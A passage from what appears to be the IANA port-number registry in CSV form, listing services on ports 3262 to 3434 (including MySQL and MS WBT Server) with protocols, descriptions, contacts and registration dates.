necp,3262,udp,NECP,[Alberto_Cerpa],[Alberto_Cerpa],,,,,, ecolor-imager,3263,tcp,E-Color Enterprise Imager,[Tamara_Baker],[Tamara_Baker],,,,,, ecolor-imager,3263,udp,E-Color Enterprise Imager,[Tamara_Baker],[Tamara_Baker],,,,,, ccmail,3264,tcp,cc:mail/lotus,[brockman],[brockman],,,,,, ccmail,3264,udp,cc:mail/lotus,[brockman],[brockman],,,,,, altav-tunnel,3265,tcp,Altav Tunnel,[Gary_M_Allen],[Gary_M_Allen],,,,,, altav-tunnel,3265,udp,Altav Tunnel,[Gary_M_Allen],[Gary_M_Allen],,,,,, ns-cfg-server,3266,tcp,NS CFG Server,[Aivi_Lie],[Aivi_Lie],,,,,, ns-cfg-server,3266,udp,NS CFG Server,[Aivi_Lie],[Aivi_Lie],,,,,, ibm-dial-out,3267,tcp,IBM Dial Out,[Skip_Booth],[Skip_Booth],,,,,, ibm-dial-out,3267,udp,IBM Dial Out,[Skip_Booth],[Skip_Booth],,,,,, msft-gc,3268,tcp,Microsoft Global Catalog,,,,,,,, msft-gc,3268,udp,Microsoft Global Catalog,,,,,,,, msft-gc-ssl,3269,tcp,Microsoft Global Catalog with LDAP/SSL,[Asaf_Kashi],[Asaf_Kashi],,,,,, msft-gc-ssl,3269,udp,Microsoft Global Catalog with LDAP/SSL,[Asaf_Kashi],[Asaf_Kashi],,,,,, verismart,3270,tcp,Verismart,[Jay_Weber],[Jay_Weber],,,,,, verismart,3270,udp,Verismart,[Jay_Weber],[Jay_Weber],,,,,, csoft-prev,3271,tcp,CSoft Prev Port,[Nedelcho_Stanev_3],[Nedelcho_Stanev_3],,,,,, csoft-prev,3271,udp,CSoft Prev Port,[Nedelcho_Stanev_3],[Nedelcho_Stanev_3],,,,,, user-manager,3272,tcp,Fujitsu User Manager,[Yukihiko_Sakurai],[Yukihiko_Sakurai],,,,,, user-manager,3272,udp,Fujitsu User Manager,[Yukihiko_Sakurai],[Yukihiko_Sakurai],,,,,, sxmp,3273,tcp,Simple Extensible Multiplexed Protocol,[admin],[admin],,,,,, sxmp,3273,udp,Simple Extensible Multiplexed Protocol,[admin],[admin],,,,,, ordinox-server,3274,tcp,Ordinox Server,[Denis_Ducharme],[Denis_Ducharme],,,,,, ordinox-server,3274,udp,Ordinox Server,[Denis_Ducharme],[Denis_Ducharme],,,,,, samd,3275,tcp,SAMD,[Edgar_Circenis],[Edgar_Circenis],,,,,, samd,3275,udp,SAMD,[Edgar_Circenis],[Edgar_Circenis],,,,,, maxim-asics,3276,tcp,Maxim ASICs,[Dave_Inman],[Dave_Inman],,,,,, maxim-asics,3276,udp,Maxim ASICs,[Dave_Inman],[Dave_Inman],,,,,, awg-proxy,3277,tcp,AWG Proxy,[Alex_McDonald],[Alex_McDonald],,,,,, awg-proxy,3277,udp,AWG Proxy,[Alex_McDonald],[Alex_McDonald],,,,,, lkcmserver,3278,tcp,LKCM Server,[Javier_Jimenez],[Javier_Jimenez],,,,,, lkcmserver,3278,udp,LKCM Server,[Javier_Jimenez],[Javier_Jimenez],,,,,, admind,3279,tcp,admind,[Jeff_Haynes],[Jeff_Haynes],,,,,, admind,3279,udp,admind,[Jeff_Haynes],[Jeff_Haynes],,,,,, vs-server,3280,tcp,VS Server,[Scott_Godlew],[Scott_Godlew],,,,,, vs-server,3280,udp,VS Server,[Scott_Godlew],[Scott_Godlew],,,,,, sysopt,3281,tcp,SYSOPT,[Tony_Hoffman],[Tony_Hoffman],,,,,, sysopt,3281,udp,SYSOPT,[Tony_Hoffman],[Tony_Hoffman],,,,,, datusorb,3282,tcp,Datusorb,[Thomas_Martin],[Thomas_Martin],,,,,, datusorb,3282,udp,Datusorb,[Thomas_Martin],[Thomas_Martin],,,,,, Apple Remote Desktop (Net Assistant),3283,tcp,Net Assistant,[Michael_Stein],[Michael_Stein],,2011-11-09,,,, Apple Remote Desktop (Net Assistant),3283,udp,Net Assistant,[Michael_Stein],[Michael_Stein],,2011-11-09,,,, 4talk,3284,tcp,4Talk,[Tony_Bushnell],[Tony_Bushnell],,,,,, 4talk,3284,udp,4Talk,[Tony_Bushnell],[Tony_Bushnell],,,,,, plato,3285,tcp,Plato,[Jim_Battin],[Jim_Battin],,,,,, plato,3285,udp,Plato,[Jim_Battin],[Jim_Battin],,,,,, e-net,3286,tcp,E-Net,[Steven_Grigsby],[Steven_Grigsby],,,,,, e-net,3286,udp,E-Net,[Steven_Grigsby],[Steven_Grigsby],,,,,, directvdata,3287,tcp,DIRECTVDATA,[Michael_Friedman],[Michael_Friedman],,,,,, directvdata,3287,udp,DIRECTVDATA,[Michael_Friedman],[Michael_Friedman],,,,,, cops,3288,tcp,COPS,[Shai_Herzog],[Shai_Herzog],,,,,, cops,3288,udp,COPS,[Shai_Herzog],[Shai_Herzog],,,,,, enpc,3289,tcp,ENPC,[SEIKO_EPSON_2],[SEIKO_EPSON_2],,,,,, enpc,3289,udp,ENPC,[SEIKO_EPSON_2],[SEIKO_EPSON_2],,,,,, caps-lm,3290,tcp,CAPS LOGISTICS TOOLKIT - LM,[Joseph_Krebs],[Joseph_Krebs],,,,,, caps-lm,3290,udp,CAPS LOGISTICS TOOLKIT - LM,[Joseph_Krebs],[Joseph_Krebs],,,,,, sah-lm,3291,tcp,S A Holditch & Associates - LM,[Randy_Hudgens],[Randy_Hudgens],,,,,, sah-lm,3291,udp,S A Holditch & Associates - LM,[Randy_Hudgens],[Randy_Hudgens],,,,,, cart-o-rama,3292,tcp,Cart O Rama,[Phillip_Dillinger],[Phillip_Dillinger],,,,,, cart-o-rama,3292,udp,Cart O Rama,[Phillip_Dillinger],[Phillip_Dillinger],,,,,, fg-fps,3293,tcp,fg-fps,,,,,,,, fg-fps,3293,udp,fg-fps,,,,,,,, fg-gip,3294,tcp,fg-gip,[Jean_Marc_Frailong],[Jean_Marc_Frailong],,,,,, fg-gip,3294,udp,fg-gip,[Jean_Marc_Frailong],[Jean_Marc_Frailong],,,,,, dyniplookup,3295,tcp,Dynamic IP Lookup,[Eugene_Osovetsky],[Eugene_Osovetsky],,,,,, dyniplookup,3295,udp,Dynamic IP Lookup,[Eugene_Osovetsky],[Eugene_Osovetsky],,,,,, rib-slm,3296,tcp,Rib License Manager,[Kristean_Heisler],[Kristean_Heisler],,,,,, rib-slm,3296,udp,Rib License Manager,[Kristean_Heisler],[Kristean_Heisler],,,,,, cytel-lm,3297,tcp,Cytel License Manager,[Yogesh_P_Gajjar],[Yogesh_P_Gajjar],,,,,, cytel-lm,3297,udp,Cytel License Manager,[Yogesh_P_Gajjar],[Yogesh_P_Gajjar],,,,,, deskview,3298,tcp,DeskView,[Manfred_Randelzofer],[Manfred_Randelzofer],,,,,, deskview,3298,udp,DeskView,[Manfred_Randelzofer],[Manfred_Randelzofer],,,,,, pdrncs,3299,tcp,pdrncs,[Paul_Wissenbach],[Paul_Wissenbach],,,,,, pdrncs,3299,udp,pdrncs,[Paul_Wissenbach],[Paul_Wissenbach],,,,,, ,3300-3301,,unassigned,,,,,,,Knwon Unauthorized Use on 3300-3301, mcs-fastmail,3302,tcp,MCS Fastmail,[Patti_Jo_Newsom],[Patti_Jo_Newsom],,,,,, mcs-fastmail,3302,udp,MCS Fastmail,[Patti_Jo_Newsom],[Patti_Jo_Newsom],,,,,, opsession-clnt,3303,tcp,OP Session Client,,,,,,,, opsession-clnt,3303,udp,OP Session Client,,,,,,,, opsession-srvr,3304,tcp,OP Session Server,[Amir_Blich],[Amir_Blich],,,,,, opsession-srvr,3304,udp,OP Session Server,[Amir_Blich],[Amir_Blich],,,,,, odette-ftp,3305,tcp,ODETTE-FTP,[David_Nash],[David_Nash],,,[RFC5024],,, odette-ftp,3305,udp,ODETTE-FTP,[David_Nash],[David_Nash],,,[RFC5024],,, mysql,3306,tcp,MySQL,[Monty],[Monty],,,,,, mysql,3306,udp,MySQL,[Monty],[Monty],,,,,, opsession-prxy,3307,tcp,OP Session Proxy,[Amir_Blich],[Amir_Blich],,,,,, opsession-prxy,3307,udp,OP Session Proxy,[Amir_Blich],[Amir_Blich],,,,,, tns-server,3308,tcp,TNS Server,,,,,,,, tns-server,3308,udp,TNS Server,,,,,,,, tns-adv,3309,tcp,TNS ADV,[Jerome_Albin],[Jerome_Albin],,,,,, tns-adv,3309,udp,TNS ADV,[Jerome_Albin],[Jerome_Albin],,,,,, dyna-access,3310,tcp,Dyna Access,[Dave_Belliveau],[Dave_Belliveau],,,,,, dyna-access,3310,udp,Dyna Access,[Dave_Belliveau],[Dave_Belliveau],,,,,, mcns-tel-ret,3311,tcp,MCNS Tel Ret,[Randall_Atkinson],[Randall_Atkinson],,,,,, mcns-tel-ret,3311,udp,MCNS Tel Ret,[Randall_Atkinson],[Randall_Atkinson],,,,,, appman-server,3312,tcp,Application Management Server,,,,,,,, appman-server,3312,udp,Application Management Server,,,,,,,, uorb,3313,tcp,Unify Object Broker,[Daegis_Inc],[Chris_Anderson],,2012-07-31,,,, uorb,3313,udp,Unify Object Broker,[Daegis_Inc],[Chris_Anderson],,2012-07-31,,,, uohost,3314,tcp,Unify Object Host,[Daegis_Inc],[Chris_Anderson],,2012-07-31,,,, uohost,3314,udp,Unify Object Host,[Daegis_Inc],[Chris_Anderson],,2012-07-31,,,, cdid,3315,tcp,CDID,[Andrew_Borisov],[Andrew_Borisov],,,,,, cdid,3315,udp,CDID,[Andrew_Borisov],[Andrew_Borisov],,,,,, aicc-cmi,3316,tcp,AICC/CMI,[William_McDonald],[William_McDonald],,,,,, aicc-cmi,3316,udp,AICC/CMI,[William_McDonald],[William_McDonald],,,,,, vsaiport,3317,tcp,VSAI PORT,[Rieko_Asai],[Rieko_Asai],,,,,, vsaiport,3317,udp,VSAI PORT,[Rieko_Asai],[Rieko_Asai],,,,,, ssrip,3318,tcp,Swith to Swith Routing Information Protocol,[Baba_Hidekazu],[Baba_Hidekazu],,,,,, ssrip,3318,udp,Swith to Swith Routing Information Protocol,[Baba_Hidekazu],[Baba_Hidekazu],,,,,, sdt-lmd,3319,tcp,SDT License Manager,[Salvo_Nassisi],[Salvo_Nassisi],,,,,, sdt-lmd,3319,udp,SDT License Manager,[Salvo_Nassisi],[Salvo_Nassisi],,,,,, officelink2000,3320,tcp,Office Link 2000,[Mike_Balch],[Mike_Balch],,,,,, officelink2000,3320,udp,Office Link 2000,[Mike_Balch],[Mike_Balch],,,,,, vnsstr,3321,tcp,VNSSTR,[Takeshi_Ohmura],[Takeshi_Ohmura],,,,,, vnsstr,3321,udp,VNSSTR,[Takeshi_Ohmura],[Takeshi_Ohmura],,,,,, active-net,3322-3325,,Active Networks,[Bob_Braden_2],[Bob_Braden_2],,,,,, sftu,3326,tcp,SFTU,[Eduardo_Rosenberg_de],[Eduardo_Rosenberg_de],,,,,, sftu,3326,udp,SFTU,[Eduardo_Rosenberg_de],[Eduardo_Rosenberg_de],,,,,, bbars,3327,tcp,BBARS,[Lou_Harris],[Lou_Harris],,,,,, bbars,3327,udp,BBARS,[Lou_Harris],[Lou_Harris],,,,,, egptlm,3328,tcp,Eaglepoint License Manager,[Dave_Benton],[Dave_Benton],,,,,, egptlm,3328,udp,Eaglepoint License Manager,[Dave_Benton],[Dave_Benton],,,,,, hp-device-disc,3329,tcp,HP Device Disc,[Shivaun_Albright],[Shivaun_Albright],,,,,, hp-device-disc,3329,udp,HP Device Disc,[Shivaun_Albright],[Shivaun_Albright],,,,,, mcs-calypsoicf,3330,tcp,MCS Calypso ICF,,,,,,,, mcs-calypsoicf,3330,udp,MCS Calypso ICF,,,,,,,, mcs-messaging,3331,tcp,MCS Messaging,,,,,,,, mcs-messaging,3331,udp,MCS Messaging,,,,,,,, mcs-mailsvr,3332,tcp,MCS Mail Server,[Patti_Jo_Newsom],[Patti_Jo_Newsom],,,,,, mcs-mailsvr,3332,udp,MCS Mail Server,[Patti_Jo_Newsom],[Patti_Jo_Newsom],,,,,, dec-notes,3333,tcp,DEC Notes,[Kim_Moraros],[Kim_Moraros],,,,,, dec-notes,3333,udp,DEC Notes,[Kim_Moraros],[Kim_Moraros],,,,,, directv-web,3334,tcp,Direct TV Webcasting,,,,,,,, directv-web,3334,udp,Direct TV Webcasting,,,,,,,, directv-soft,3335,tcp,Direct TV Software Updates,,,,,,,, directv-soft,3335,udp,Direct TV Software Updates,,,,,,,, directv-tick,3336,tcp,Direct TV Tickers,,,,,,,, directv-tick,3336,udp,Direct TV Tickers,,,,,,,, directv-catlg,3337,tcp,Direct TV Data Catalog,[Michael_Friedman],[Michael_Friedman],,,,,, directv-catlg,3337,udp,Direct TV Data Catalog,[Michael_Friedman],[Michael_Friedman],,,,,, anet-b,3338,tcp,OMF data b,,,,,,,, anet-b,3338,udp,OMF data b,,,,,,,, anet-l,3339,tcp,OMF data l,,,,,,,, anet-l,3339,udp,OMF data l,,,,,,,, anet-m,3340,tcp,OMF data m,,,,,,,, anet-m,3340,udp,OMF data m,,,,,,,, anet-h,3341,tcp,OMF data h,[Per_Sahlqvist],[Per_Sahlqvist],,,,,, anet-h,3341,udp,OMF data h,[Per_Sahlqvist],[Per_Sahlqvist],,,,,, webtie,3342,tcp,WebTIE,[Kevin_Frender],[Kevin_Frender],,,,,, webtie,3342,udp,WebTIE,[Kevin_Frender],[Kevin_Frender],,,,,, ms-cluster-net,3343,tcp,MS Cluster Net,[David_Dion],[David_Dion],2009-02-12,,,,, ms-cluster-net,3343,udp,MS Cluster Net,[David_Dion],[David_Dion],2009-02-12,,,,, bnt-manager,3344,tcp,BNT Manager,[Engineering_Dept],[Engineering_Dept],,,,,, bnt-manager,3344,udp,BNT Manager,[Engineering_Dept],[Engineering_Dept],,,,,, influence,3345,tcp,Influence,[Russ_Ferriday],[Russ_Ferriday],,,,,, influence,3345,udp,Influence,[Russ_Ferriday],[Russ_Ferriday],,,,,, trnsprntproxy,3346,tcp,Trnsprnt Proxy,[Grant_Kirby],[Grant_Kirby],,,,,, trnsprntproxy,3346,udp,Trnsprnt Proxy,[Grant_Kirby],[Grant_Kirby],,,,,, phoenix-rpc,3347,tcp,Phoenix RPC,[Ian_Anderson],[Ian_Anderson],,,,,, phoenix-rpc,3347,udp,Phoenix RPC,[Ian_Anderson],[Ian_Anderson],,,,,, pangolin-laser,3348,tcp,Pangolin Laser,[William_Benner],[William_Benner],,,,,, pangolin-laser,3348,udp,Pangolin Laser,[William_Benner],[William_Benner],,,,,, chevinservices,3349,tcp,Chevin Services,[Gus_McNaughton],[Gus_McNaughton],,,,,, chevinservices,3349,udp,Chevin Services,[Gus_McNaughton],[Gus_McNaughton],,,,,, findviatv,3350,tcp,FINDVIATV,[Oran_Davis],[Oran_Davis],,,,,, findviatv,3350,udp,FINDVIATV,[Oran_Davis],[Oran_Davis],,,,,, btrieve,3351,tcp,Btrieve port,,,,,,,, btrieve,3351,udp,Btrieve port,,,,,,,, ssql,3352,tcp,Scalable SQL,[Chuck_Talk],[Chuck_Talk],,,,,, ssql,3352,udp,Scalable SQL,[Chuck_Talk],[Chuck_Talk],,,,,, fatpipe,3353,tcp,FATPIPE,[Sanchaita_Datta],[Sanchaita_Datta],,,,,, fatpipe,3353,udp,FATPIPE,[Sanchaita_Datta],[Sanchaita_Datta],,,,,, suitjd,3354,tcp,SUITJD,[Todd_Moyer],[Todd_Moyer],,,,,, suitjd,3354,udp,SUITJD,[Todd_Moyer],[Todd_Moyer],,,,,, ordinox-dbase,3355,tcp,Ordinox Dbase,[Denis_Ducharme],[Denis_Ducharme],,,,,, ordinox-dbase,3355,udp,Ordinox Dbase,[Denis_Ducharme],[Denis_Ducharme],,,,,, upnotifyps,3356,tcp,UPNOTIFYPS,[Mark_Fox],[Mark_Fox],,,,,, upnotifyps,3356,udp,UPNOTIFYPS,[Mark_Fox],[Mark_Fox],,,,,, adtech-test,3357,tcp,Adtech Test IP,[Robin_Uyeshiro],[Robin_Uyeshiro],,,,,, adtech-test,3357,udp,Adtech Test IP,[Robin_Uyeshiro],[Robin_Uyeshiro],,,,,, mpsysrmsvr,3358,tcp,Mp Sys Rmsvr,[Hiroyuki_Kawabuchi],[Hiroyuki_Kawabuchi],,,,,, mpsysrmsvr,3358,udp,Mp Sys Rmsvr,[Hiroyuki_Kawabuchi],[Hiroyuki_Kawabuchi],,,,,, wg-netforce,3359,tcp,WG NetForce,[Lee_Wheat],[Lee_Wheat],,,,,, wg-netforce,3359,udp,WG NetForce,[Lee_Wheat],[Lee_Wheat],,,,,, kv-server,3360,tcp,KV Server,,,,,,,, kv-server,3360,udp,KV Server,,,,,,,, kv-agent,3361,tcp,KV Agent,[Thomas_Soranno],[Thomas_Soranno],,,,,, kv-agent,3361,udp,KV Agent,[Thomas_Soranno],[Thomas_Soranno],,,,,, dj-ilm,3362,tcp,DJ ILM,[Don_Tyson],[Don_Tyson],,,,,, dj-ilm,3362,udp,DJ ILM,[Don_Tyson],[Don_Tyson],,,,,, nati-vi-server,3363,tcp,NATI Vi Server,[Robert_Dye],[Robert_Dye],,,,,, nati-vi-server,3363,udp,NATI Vi Server,[Robert_Dye],[Robert_Dye],,,,,, creativeserver,3364,tcp,Creative Server,,,,,,,, creativeserver,3364,udp,Creative Server,,,,,,,, contentserver,3365,tcp,Content Server,,,,,,,, contentserver,3365,udp,Content Server,,,,,,,, creativepartnr,3366,tcp,Creative Partner,[Jesus_Ortiz_2],[Jesus_Ortiz_2],,,,,, creativepartnr,3366,udp,Creative Partner,[Jesus_Ortiz_2],[Jesus_Ortiz_2],,,,,, satvid-datalnk,3367-3371,,Satellite Video Data Link,[Scott_Engel],[Scott_Engel],,,,,, tip2,3372,tcp,TIP 2,[Keith_Evans],[Keith_Evans],,,,,, tip2,3372,udp,TIP 2,[Keith_Evans],[Keith_Evans],,,,,, lavenir-lm,3373,tcp,Lavenir License Manager,[Marius_Matioc],[Marius_Matioc],,,,,, lavenir-lm,3373,udp,Lavenir License Manager,[Marius_Matioc],[Marius_Matioc],,,,,, cluster-disc,3374,tcp,Cluster Disc,[Jeff_Hughes],[Jeff_Hughes],,,,,, cluster-disc,3374,udp,Cluster Disc,[Jeff_Hughes],[Jeff_Hughes],,,,,, vsnm-agent,3375,tcp,VSNM Agent,[Venkat_Rangan],[Venkat_Rangan],,,,,, vsnm-agent,3375,udp,VSNM Agent,[Venkat_Rangan],[Venkat_Rangan],,,,,, cdbroker,3376,tcp,CD Broker,[Moon_Ho_Chung],[Moon_Ho_Chung],,,,,, cdbroker,3376,udp,CD Broker,[Moon_Ho_Chung],[Moon_Ho_Chung],,,,,, cogsys-lm,3377,tcp,Cogsys Network License Manager,[Simon_Chinnick],[Simon_Chinnick],,,,,, cogsys-lm,3377,udp,Cogsys Network License Manager,[Simon_Chinnick],[Simon_Chinnick],,,,,, wsicopy,3378,tcp,WSICOPY,[James_Overby],[James_Overby],,,,,, wsicopy,3378,udp,WSICOPY,[James_Overby],[James_Overby],,,,,, socorfs,3379,tcp,SOCORFS,[Hugo_Charbonneau],[Hugo_Charbonneau],,,,,, socorfs,3379,udp,SOCORFS,[Hugo_Charbonneau],[Hugo_Charbonneau],,,,,, sns-channels,3380,tcp,SNS Channels,[Shekar_Pasumarthi],[Shekar_Pasumarthi],,,,,, sns-channels,3380,udp,SNS Channels,[Shekar_Pasumarthi],[Shekar_Pasumarthi],,,,,, geneous,3381,tcp,Geneous,[Nick_de_Smith],[Nick_de_Smith],,,,,, geneous,3381,udp,Geneous,[Nick_de_Smith],[Nick_de_Smith],,,,,, fujitsu-neat,3382,tcp,Fujitsu Network Enhanced Antitheft function,[Markku_Viima],[Markku_Viima],,,,,, fujitsu-neat,3382,udp,Fujitsu Network Enhanced Antitheft function,[Markku_Viima],[Markku_Viima],,,,,, esp-lm,3383,tcp,Enterprise Software Products License Manager,[George_Rudy],[George_Rudy],,,,,, esp-lm,3383,udp,Enterprise Software Products License Manager,[George_Rudy],[George_Rudy],,,,,, hp-clic,3384,tcp,Cluster Management Services,[Rajesh_Srinivasaragh],[Rajesh_Srinivasaragh],,,,,, hp-clic,3384,udp,Hardware Management,[Rajesh_Srinivasaragh],[Rajesh_Srinivasaragh],,,,,, qnxnetman,3385,tcp,qnxnetman,[Michael_Hunter],[Michael_Hunter],,,,,, qnxnetman,3385,udp,qnxnetman,[Michael_Hunter],[Michael_Hunter],,,,,, gprs-data,3386,tcp,GPRS Data,,,,,,,, gprs-sig,3386,udp,GPRS SIG,[Ansgar_Bergmann],[Ansgar_Bergmann],,,,,, backroomnet,3387,tcp,Back Room Net,[Clayton_Wilkinson],[Clayton_Wilkinson],,,,,, backroomnet,3387,udp,Back Room Net,[Clayton_Wilkinson],[Clayton_Wilkinson],,,,,, cbserver,3388,tcp,CB Server,[Allen_Wei],[Allen_Wei],,,,,, cbserver,3388,udp,CB Server,[Allen_Wei],[Allen_Wei],,,,,, ms-wbt-server,3389,tcp,MS WBT Server,[Ritu_Bahl],[Ritu_Bahl],,,,,, ms-wbt-server,3389,udp,MS WBT Server,[Ritu_Bahl],[Ritu_Bahl],,,,,, dsc,3390,tcp,Distributed Service Coordinator,[Charles_Honton],[Charles_Honton],,,,,, dsc,3390,udp,Distributed Service Coordinator,[Charles_Honton],[Charles_Honton],,,,,, savant,3391,tcp,SAVANT,[Andy_Bruce],[Andy_Bruce],,,,,, savant,3391,udp,SAVANT,[Andy_Bruce],[Andy_Bruce],,,,,, efi-lm,3392,tcp,EFI License Management,[Ross_E_Greinke],[Ross_E_Greinke],,,,,, efi-lm,3392,udp,EFI License Management,[Ross_E_Greinke],[Ross_E_Greinke],,,,,, d2k-tapestry1,3393,tcp,D2K Tapestry Client to Server,,,,,,,, d2k-tapestry1,3393,udp,D2K Tapestry Client to Server,,,,,,,, d2k-tapestry2,3394,tcp,D2K Tapestry Server to Server,[Eric_Lan],[Eric_Lan],,,,,, d2k-tapestry2,3394,udp,D2K Tapestry Server to Server,[Eric_Lan],[Eric_Lan],,,,,, dyna-lm,3395,tcp,Dyna License Manager (Elam),[Anjana_Iyer],[Anjana_Iyer],,,,,, dyna-lm,3395,udp,Dyna License Manager (Elam),[Anjana_Iyer],[Anjana_Iyer],,,,,, printer-agent,3396,tcp,"Printer Agent IANA assigned this well-formed service name as a replacement for ""printer_agent"".",[Devon_Taylor],[Devon_Taylor],,,,,, printer_agent,3396,tcp,Printer Agent,[Devon_Taylor],[Devon_Taylor],,,,,,"This entry is an alias to ""printer-agent"". This entry is now historic, not usable for use with many common service discovery mechanisms." printer-agent,3396,udp,"Printer Agent IANA assigned this well-formed service name as a replacement for ""printer_agent"".",[Devon_Taylor],[Devon_Taylor],,,,,, printer_agent,3396,udp,Printer Agent,[Devon_Taylor],[Devon_Taylor],,,,,,"This entry is an alias to ""printer-agent"". This entry is now historic, not usable for use with many common service discovery mechanisms." cloanto-lm,3397,tcp,Cloanto License Manager,[Takeo_Sato],[Takeo_Sato],2010-04-30,,,,, cloanto-lm,3397,udp,Cloanto License Manager,[Takeo_Sato],[Takeo_Sato],2010-04-30,,,,, mercantile,3398,tcp,Mercantile,[Erik_Kragh_Jensen],[Erik_Kragh_Jensen],,,,,, mercantile,3398,udp,Mercantile,[Erik_Kragh_Jensen],[Erik_Kragh_Jensen],,,,,, csms,3399,tcp,CSMS,,,,,,,, csms,3399,udp,CSMS,,,,,,,, csms2,3400,tcp,CSMS2,[Markus_Michels_2],[Markus_Michels_2],,,,,, csms2,3400,udp,CSMS2,[Markus_Michels_2],[Markus_Michels_2],,,,,, filecast,3401,tcp,filecast,[Eden_Sherry],[Eden_Sherry],,,,,, filecast,3401,udp,filecast,[Eden_Sherry],[Eden_Sherry],,,,,, fxaengine-net,3402,tcp,FXa Engine Network Port,[Lucas_Alonso],[Lucas_Alonso],2002-02,,,,, fxaengine-net,3402,udp,FXa Engine Network Port,[Lucas_Alonso],[Lucas_Alonso],2002-02,,,,, ,3403,,De-registered,,,,2006-10-27,,,, ,3404,,Removed,,,,2002-05-01,,,, nokia-ann-ch1,3405,tcp,Nokia Announcement ch 1,,,,,,,, nokia-ann-ch1,3405,udp,Nokia Announcement ch 1,,,,,,,, nokia-ann-ch2,3406,tcp,Nokia Announcement ch 2,[Morteza_Kalhour],[Morteza_Kalhour],2002-02,,,,, nokia-ann-ch2,3406,udp,Nokia Announcement ch 2,[Morteza_Kalhour],[Morteza_Kalhour],2002-02,,,,, ldap-admin,3407,tcp,LDAP admin server port,[Stephen_Tsun_2],[Stephen_Tsun_2],2002-02,,,,, ldap-admin,3407,udp,LDAP admin server port,[Stephen_Tsun_2],[Stephen_Tsun_2],2002-02,,,,, BESApi,3408,tcp,BES Api Port,[Colin_Griffiths],[Colin_Griffiths],2002-02,,,,, BESApi,3408,udp,BES Api Port,[Colin_Griffiths],[Colin_Griffiths],2002-02,,,,, networklens,3409,tcp,NetworkLens Event Port,,,,,,,, networklens,3409,udp,NetworkLens Event Port,,,,,,,, networklenss,3410,tcp,NetworkLens SSL Event,[Greg_Bailey],[Greg_Bailey],2002-02,,,,, networklenss,3410,udp,NetworkLens SSL Event,[Greg_Bailey],[Greg_Bailey],2002-02,,,,, biolink-auth,3411,tcp,BioLink Authenteon server,[BioLink_Support],[BioLink_Support],2002-02,,,,, biolink-auth,3411,udp,BioLink Authenteon server,[BioLink_Support],[BioLink_Support],2002-02,,,,, xmlblaster,3412,tcp,xmlBlaster,[Marcel_Ruff],[Marcel_Ruff],2002-02,,,,, xmlblaster,3412,udp,xmlBlaster,[Marcel_Ruff],[Marcel_Ruff],2002-02,,,,, svnet,3413,tcp,SpecView Networking,[Richard_Dickins],[Richard_Dickins],2002-02,,,,, svnet,3413,udp,SpecView Networking,[Richard_Dickins],[Richard_Dickins],2002-02,,,,, wip-port,3414,tcp,BroadCloud WIP Port,,,,,,,, wip-port,3414,udp,BroadCloud WIP Port,,,,,,,, bcinameservice,3415,tcp,BCI Name Service,[Dennis_Parker],[Dennis_Parker],2002-02,,,,, bcinameservice,3415,udp,BCI Name Service,[Dennis_Parker],[Dennis_Parker],2002-02,,,,, commandport,3416,tcp,AirMobile IS Command Port,[Mike_Klein],[Mike_Klein],2002-02,,,,, commandport,3416,udp,AirMobile IS Command Port,[Mike_Klein],[Mike_Klein],2002-02,,,,, csvr,3417,tcp,ConServR file translation,[Albert_Leung],[Albert_Leung],2002-02,,,,, csvr,3417,udp,ConServR file translation,[Albert_Leung],[Albert_Leung],2002-02,,,,, rnmap,3418,tcp,Remote nmap,[Tuomo_Makinen],[Tuomo_Makinen],2002-02,,,,, rnmap,3418,udp,Remote nmap,[Tuomo_Makinen],[Tuomo_Makinen],2002-02,,,,, softaudit,3419,tcp,Isogon SoftAudit,[Per_Hellberg],[Per_Hellberg],2002-02,,,,, softaudit,3419,udp,ISogon SoftAudit,[Per_Hellberg],[Per_Hellberg],2002-02,,,,, ifcp-port,3420,tcp,iFCP User Port,,,,,[RFC4172],,, ifcp-port,3420,udp,iFCP User Port,,,,,[RFC4172],,, bmap,3421,tcp,Bull Apprise portmapper,[Jeremy_Gilbert],[Jeremy_Gilbert],,,,,, bmap,3421,udp,Bull Apprise portmapper,[Jeremy_Gilbert],[Jeremy_Gilbert],,,,,, rusb-sys-port,3422,tcp,Remote USB System Port,[Steven_Klein],[Steven_Klein],2002-02,,,,, rusb-sys-port,3422,udp,Remote USB System Port,[Steven_Klein],[Steven_Klein],2002-02,,,,, xtrm,3423,tcp,xTrade Reliable Messaging,,,,,,,, xtrm,3423,udp,xTrade Reliable Messaging,,,,,,,, xtrms,3424,tcp,xTrade over TLS/SSL,[Mats_Nilsson],[Mats_Nilsson],2002-02,,,,, xtrms,3424,udp,xTrade over TLS/SSL,[Mats_Nilsson],[Mats_Nilsson],2002-02,,,,, agps-port,3425,tcp,AGPS Access Port,[Kristoffer_Nilsson],[Kristoffer_Nilsson],2002-02,,,,, agps-port,3425,udp,AGPS Access Port,[Kristoffer_Nilsson],[Kristoffer_Nilsson],2002-02,,,,, arkivio,3426,tcp,Arkivio Storage Protocol,[Bruce_Greenblatt],[Bruce_Greenblatt],2002-02,,,,, arkivio,3426,udp,Arkivio Storage Protocol,[Bruce_Greenblatt],[Bruce_Greenblatt],2002-02,,,,, websphere-snmp,3427,tcp,WebSphere SNMP,[Richard_Mills],[Richard_Mills],2002-02,,,,, websphere-snmp,3427,udp,WebSphere SNMP,[Richard_Mills],[Richard_Mills],2002-02,,,,, twcss,3428,tcp,2Wire CSS,[Wire_IANA_Contact],[Wire_IANA_Contact],2002-02,,,,, twcss,3428,udp,2Wire CSS,[Wire_IANA_Contact],[Wire_IANA_Contact],2002-02,,,,, gcsp,3429,tcp,GCSP user port,[Anirban_Majumder],[Anirban_Majumder],2002-03,,,,, gcsp,3429,udp,GCSP user port,[Anirban_Majumder],[Anirban_Majumder],2002-03,,,,, ssdispatch,3430,tcp,Scott Studios Dispatch,[Michael_Settles],[Michael_Settles],2002-03,,,,, ssdispatch,3430,udp,Scott Studios Dispatch,[Michael_Settles],[Michael_Settles],2002-03,,,,, ndl-als,3431,tcp,Active License Server Port,[Quentin_Brown],[Quentin_Brown],2002-03,,,,, ndl-als,3431,udp,Active License Server Port,[Quentin_Brown],[Quentin_Brown],2002-03,,,,, osdcp,3432,tcp,Secure Device Protocol,[Peter_Fernandez],[Peter_Fernandez],2002-03,,,,, osdcp,3432,udp,Secure Device Protocol,[Peter_Fernandez],[Peter_Fernandez],2002-03,,,,, opnet-smp,3433,tcp,OPNET Service Management Platform,[OPNET_Technologies_Inc],[Edward_Macomber],2002-03,2011-09-21,,,, opnet-smp,3433,udp,OPNET Service Management Platform,[OPNET_Technologies_Inc],[Edward_Macomber],2002-03,2011-09-21,,,, opencm,3434,tcp,OpenCM Server,[Jonathan_S_Shapiro],[Jonathan_S_Shapiro],2002-03,,,,, opencm,3434,udp,OpenCM 